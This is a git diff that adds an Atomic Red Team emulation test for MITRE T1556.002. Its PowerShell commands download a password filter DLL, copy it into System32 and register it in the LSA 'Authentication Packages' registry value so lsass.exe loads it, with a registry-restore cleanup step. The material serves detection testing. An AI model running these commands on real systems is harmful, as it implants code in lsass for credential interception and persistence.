Update T1556.002.yaml (#2860)

New Test Install Additional Authentication Packages Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-07-17 08:22:30 +05:30
parent 12c1fabcf5
commit b0c87f11fc
1 changed files with 41 additions and 0 deletions
@@ -42,3 +42,44 @@ atomic_tests:
      remove-item C:\Windows\System32\#{dll_name}
    name: powershell
    elevation_required: true
+- name: Install Additional Authentication Packages
+  description: |
+    lsass.exe loads all DLLs specified by the Authentication Packages REG_MULTI_SZ value.
+    Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
+    The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
+    Source is in src folder. 
+    This does require a reboot to see the filter loaded into lsass.exe. 
+    It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dll_path:
+      description: Path to DLL to be installed and registered as additional authentication package
+      type: path
+      default: PathToAtomicsFolder\T1556.002\bin
+    dll_name:
+      description: Name of the Password Filter
+      type: string
+      default: AtomicRedTeamPWFilter.dll
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\#{dll_name})
+    prereq_command: |
+      if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
+  executor:
+    command: |
+      reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
+      $passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
+      $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
+      $AuthenticationPackagesValues = $lsaKey.GetValue("Authentication Packages")
+      $AuthenticationPackagesValues += $passwordFilterName
+      Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Authentication Packages" $AuthenticationPackagesValues
+    cleanup_command: |
+      reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
+      remove-item C:\Windows\System32\#{dll_name}
+    name: powershell
+    elevation_required: true